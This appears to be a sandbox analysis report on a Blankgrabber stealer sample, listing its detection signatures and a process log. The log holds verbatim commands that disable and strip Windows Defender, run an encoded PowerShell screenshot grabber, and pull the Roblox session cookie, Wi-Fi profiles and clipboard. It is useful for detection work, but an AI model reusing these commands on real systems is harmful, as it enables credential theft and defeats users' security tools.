Analysis Overview
SHA256
77e67941a20d70449b0a5ba735a279f1d81429d9ea08181591cf910f69b04b71
Threat Level: Known bad
The file Built.exe was found to be: Known bad.
Malicious Activity Summary
Deletes Windows Defender Definitions
A stealer written in Python and packaged with Pyinstaller
Blankgrabber family
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
UPX packed file
Executes dropped EXE
Reads user/profile data of web browsers
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Event Triggered Execution: Netsh Helper DLL
Unsigned PE
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Gathers system information
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Detects videocard installed
Enumerates processes with tasklist
Views/modifies file attributes
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-26 13:11
Signatures
A stealer written in Python and packaged with Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blankgrabber family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-26 13:10
Reported
2024-06-26 13:15
Platform
win10-20240611-fr
Max time kernel
146s
Max time network
153s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI18642\rar.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nwth3d11\nwth3d11.cmdline"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC966.tmp" "c:\Users\Admin\AppData\Local\Temp\nwth3d11\CSCBD0D024427384C299BA7C176B2D0357A.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI18642\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\YVl6C.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI18642\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI18642\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\YVl6C.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
